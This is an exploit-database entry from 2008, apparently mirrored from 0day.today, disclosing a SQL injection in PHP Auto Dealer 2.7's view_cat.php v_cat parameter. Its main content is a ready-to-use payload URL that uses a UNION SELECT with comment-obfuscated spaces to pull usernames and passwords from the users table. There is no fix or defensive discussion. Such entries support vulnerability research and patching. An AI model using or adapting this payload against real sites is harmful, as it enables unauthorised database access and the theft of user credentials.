id: 3851
date: 10/06/2008
title: PHP Auto Dealer 2.7 (view_cat.php v_cat) SQL Injection Vulnerability
author: Mr.SQL
cves: 

====================================================================
PHP Auto Dealer 2.7 (view_cat.php v_cat) SQL Injection Vulnerability
====================================================================



###############################################################
##
## Remote SQL Injection Vulnerability
##
## PHP Auto Dealer 2.7 ( view_cat.php v_cat )
##
## http://selectdevelopment.com/
###############################################################
###############################################################
## AuTh0r : Mr.SQL
########################
########################
##
## -[[: Exploite :]]-
##
## www.TraGeT./view_cat.php?v_cat=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3a,username,password)MrSQL/**/FROM/**/users/**/limit+1,1--
##
########################
########################





#  0day.today [2023-03-26]  #